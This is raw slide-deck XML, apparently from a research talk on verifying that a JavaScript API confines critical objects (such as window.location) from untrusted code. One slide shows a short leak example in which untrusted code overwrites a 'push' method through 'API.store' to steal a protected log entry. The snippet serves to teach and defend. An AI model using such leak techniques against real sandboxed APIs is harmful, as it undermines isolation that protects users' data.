            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1991991" y="1977345"/>
              <a:ext cx="1981199" cy="1587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429000" y="1295400"/>
              <a:ext cx="4686300" cy="18332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9000" y="2590800"/>
              <a:ext cx="4686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API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76200" y="1143000"/>
            <a:ext cx="2971800" cy="388620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143000" y="5486400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Does the log leak out to untrusted code ?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Design: Adding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>store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304800" y="1760232"/>
            <a:ext cx="4114800" cy="2583168"/>
            <a:chOff x="-19756" y="2209800"/>
            <a:chExt cx="4648200" cy="3039320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-19756" y="4488656"/>
              <a:ext cx="4648200" cy="76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var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> log = </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> [&lt;critical&gt;,0,0]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr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496710" y="2209800"/>
              <a:ext cx="1903591" cy="1986525"/>
              <a:chOff x="496710" y="2209800"/>
              <a:chExt cx="1903591" cy="1986525"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="7" name="Group 12"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="496710" y="2209800"/>
                <a:ext cx="1903591" cy="1981201"/>
                <a:chOff x="618791" y="1752600"/>
                <a:chExt cx="1286210" cy="192702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18792" y="1752600"/>
                  <a:ext cx="1286209" cy="1927021"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="25400"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18791" y="2413326"/>
                  <a:ext cx="1286208" cy="1588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18792" y="3086692"/>
                  <a:ext cx="1286208" cy="1817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496711" y="2256015"/>
                <a:ext cx="1903590" cy="43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376092"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>&lt;critical&gt;</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/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6711" y="2973262"/>
                <a:ext cx="1903589" cy="54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376092"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="376092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6711" y="3653136"/>
                <a:ext cx="1903589" cy="54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376092"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2792091" y="1295401"/>
            <a:ext cx="6123309" cy="3052465"/>
            <a:chOff x="1991991" y="1295401"/>
            <a:chExt cx="6123309" cy="3084854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3973189" y="1524000"/>
              <a:ext cx="3608711" cy="906691"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -23297"/>
                <a:gd name="adj2" fmla="val 51294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function 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push(x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)</a:t>
              </a:r>
            </a:p>
            <a:p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  {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log.push(x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)}</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1991991" y="1977345"/>
              <a:ext cx="1981199" cy="1587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429000" y="1295401"/>
              <a:ext cx="4686300" cy="308034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9000" y="3913691"/>
              <a:ext cx="4686300" cy="46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API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76200" y="1143000"/>
            <a:ext cx="2971800" cy="388620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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4773288" y="2895600"/>
            <a:ext cx="3608712" cy="930155"/>
            <a:chOff x="3853114" y="3741955"/>
            <a:chExt cx="3810002" cy="930155"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rounded Rectangular Callout 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3853114" y="3765419"/>
              <a:ext cx="3810001" cy="906691"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 21176"/>
                <a:gd name="adj2" fmla="val 49894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3114" y="3741955"/>
              <a:ext cx="38100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function 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store(i,x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)   </a:t>
              </a:r>
            </a:p>
            <a:p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  {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log[i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] = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="376092"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376092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rot="10800000" flipV="1">
            <a:off x="3048000" y="3352800"/>
            <a:ext cx="1752600" cy="1588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09600" y="4724400"/>
            <a:ext cx="7944787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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> leaks !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steal;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>API.store(“push”,function(){steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = this});</a:t>
            </a:r>
          </a:p>
          <a:p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API.push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();  // steal now contains &lt;critical&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="376092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16-Point Star 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752597" y="2603567"/>
            <a:ext cx="457203" cy="450416"/>
          </a:xfrm>
          <a:prstGeom prst="star16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Verifying Confinement: Approach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1827208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stCxn id="9" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1066800" y="2208208"/>
            <a:ext cx="304800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3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4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1520212" y="2211996"/>
            <a:ext cx="312376" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3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05812" y="3050196"/>
            <a:ext cx="388576" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700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1835032" y="3269568"/>
            <a:ext cx="673339" cy="228603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4115011"/>
            <a:ext cx="2394167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600" dirty="0" smtClean="0"/>
              <a:t>Resources,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Oval 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152398" y="1219200"/>
            <a:ext cx="2394169" cy="4419601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rot="16200000" flipH="1">
            <a:off x="1104900" y="2932108"/>
            <a:ext cx="304800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700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>
            <a:off x="1295400" y="4037006"/>
            <a:ext cx="457200" cy="5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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2546567" y="2559767"/>
            <a:ext cx="4159034" cy="488233"/>
            <a:chOff x="2546567" y="3169367"/>
            <a:chExt cx="4159034" cy="488233"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="67" name="Straight Arrow Connector 66"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="81" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2546567" y="3464810"/>
              <a:ext cx="2100104" cy="3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V="1">
              <a:off x="5029204" y="3464812"/>
              <a:ext cx="1676397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5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4572000" y="3169367"/>
              <a:ext cx="647701" cy="488233"/>
              <a:chOff x="3810000" y="1928096"/>
              <a:chExt cx="647701" cy="578928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810003" y="2049825"/>
                <a:ext cx="457200" cy="45719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810000" y="1928096"/>
                <a:ext cx="647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</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="TextBox 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257299" y="1691627"/>
            <a:ext cx="6477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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="3215627"/>
            <a:ext cx="647701" cy="592781"/>
            <a:chOff x="1295400" y="3352800"/>
            <a:chExt cx="647701" cy="592781"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Oval 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1295400" y="3488381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95400" y="3352800"/>
              <a:ext cx="64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</p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="376378" y="4125405"/>
            <a:ext cx="466442" cy="1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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="381000" y="3291827"/>
            <a:ext cx="647701" cy="600357"/>
            <a:chOff x="381000" y="3429000"/>
            <a:chExt cx="647701" cy="600357"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="381000" y="3572157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1000" y="3429000"/>
              <a:ext cx="64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-25000" dirty="0" smtClean="0"/>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/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762000" y="2453627"/>
            <a:ext cx="647701" cy="592781"/>
            <a:chOff x="762000" y="2590800"/>
            <a:chExt cx="647701" cy="592781"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762000" y="2726381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62000" y="2590800"/>
              <a:ext cx="64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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6705598" y="1879567"/>
            <a:ext cx="2133604" cy="2783860"/>
            <a:chOff x="6705598" y="2016740"/>
            <a:chExt cx="2133604" cy="2783860"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Rectangle 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6705601" y="2016740"/>
              <a:ext cx="2133600" cy="27838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05598" y="2016740"/>
              <a:ext cx="2133604" cy="278386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705597" y="4628184"/>
            <a:ext cx="213360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Untrusted JS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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6671" y="2433935"/>
            <a:ext cx="23590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Invoke</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6972298" y="3834470"/>
            <a:ext cx="647701" cy="592781"/>
            <a:chOff x="762000" y="2590800"/>
            <a:chExt cx="647701" cy="592781"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Oval 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762000" y="2726381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2000" y="2590800"/>
              <a:ext cx="64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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 95"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="1686580"/>
            <a:ext cx="6629400" cy="1590020"/>
            <a:chOff x="914400" y="1915180"/>
            <a:chExt cx="6629400" cy="1590020"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Arc 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="2362200"/>
              <a:ext cx="6629400" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 11055337"/>
                <a:gd name="adj2" fmla="val 20979930"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:prstDash val="dash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54350" y="1915180"/>
              <a:ext cx="235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Return </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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 flipV="1">
              <a:off x="1152246" y="3106366"/>
              <a:ext cx="1438555" cy="2606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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219200" y="2225027"/>
            <a:ext cx="5400955" cy="514261"/>
            <a:chOff x="1219200" y="2433935"/>
            <a:chExt cx="5400955" cy="514261"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="45" name="Straight Arrow Connector 44"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1219200" y="2895600"/>
              <a:ext cx="5400955" cy="5259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048000" y="2433935"/>
              <a:ext cx="235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Access </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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09"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457201" y="2842280"/>
            <a:ext cx="1219199" cy="1575728"/>
            <a:chOff x="457201" y="2979453"/>
            <a:chExt cx="1219199" cy="1575728"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="Straight Arrow Connector 57"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="13" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="1220035" y="2911662"/>
              <a:ext cx="312374" cy="44795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 flipV="1">
              <a:off x="495300" y="3148055"/>
              <a:ext cx="342900" cy="34032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1413487" y="4139869"/>
              <a:ext cx="516581" cy="924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03532" y="4292269"/>
              <a:ext cx="516581" cy="924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01"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7581899" y="3148670"/>
            <a:ext cx="1257301" cy="1286157"/>
            <a:chOff x="7581899" y="3352800"/>
            <a:chExt cx="1257301" cy="1286157"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 60"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7581899" y="4038600"/>
              <a:ext cx="647701" cy="600357"/>
              <a:chOff x="381000" y="3429000"/>
              <a:chExt cx="647701" cy="600357"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="62" name="Oval 61"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="381000" y="3572157"/>
                <a:ext cx="457200" cy="4572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1000" y="3429000"/>
                <a:ext cx="647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r>
                  <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>3</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="Group 67"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8191499" y="4038600"/>
              <a:ext cx="647701" cy="592781"/>
              <a:chOff x="1295400" y="3352800"/>
              <a:chExt cx="647701" cy="592781"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Oval 69"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1295400" y="3488381"/>
                <a:ext cx="457200" cy="4572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295400" y="3352800"/>
                <a:ext cx="647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r>
                  <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>4</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2800" baseline="-25000" dirty="0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 rot="16200000" flipH="1">
              <a:off x="8086004" y="3724994"/>
              <a:ext cx="744389" cy="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7400207" y="3724994"/>
              <a:ext cx="744389" cy="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13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1752601" y="3063227"/>
            <a:ext cx="4953001" cy="513965"/>
            <a:chOff x="1752601" y="3200400"/>
            <a:chExt cx="4953001" cy="513965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="TextBox 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3276600" y="3200400"/>
              <a:ext cx="235585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Side-effect </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>r</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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10800000">
              <a:off x="1752601" y="3712777"/>
              <a:ext cx="4953001" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2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89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1685645" y="3741451"/>
            <a:ext cx="905155" cy="921975"/>
            <a:chOff x="1685645" y="3741452"/>
            <a:chExt cx="752755" cy="906748"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="80" name="Straight Arrow Connector 79"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="92" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="1574721" y="3852376"/>
              <a:ext cx="441201" cy="21935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1790701" y="4191000"/>
              <a:ext cx="457200" cy="457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90699" y="4124980"/>
              <a:ext cx="64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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 125"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743201" y="3977627"/>
            <a:ext cx="3722080" cy="1808496"/>
            <a:chOff x="7140494" y="2194630"/>
            <a:chExt cx="2115454" cy="1808496"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Oval 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7140494" y="2194630"/>
              <a:ext cx="2115454" cy="1808496"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:prstDash val="dash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86961" y="2804230"/>
              <a:ext cx="14348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accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Repeat </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2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678719" y="5786123"/>
            <a:ext cx="387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Precision-Efficiency tradeoff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Oval Callout 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="1219200"/>
            <a:ext cx="876299" cy="467380"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -84547"/>
              <a:gd name="adj2" fmla="val 2443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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Rounded Rectangular Callout 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1083619"/>
            <a:ext cx="2514597" cy="608008"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44470"/>
              <a:gd name="adj2" fmla="val 1940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Critical,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e.g.,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window.location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5" grpId="2"/>
      <p:bldP spid="72" grpId="0"/>
      <p:bldP spid="83" grpId="0" animBg="1"/>
      <p:bldP spid="8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 of API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399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code is part of the trusted computing  base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Small in size, relative to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
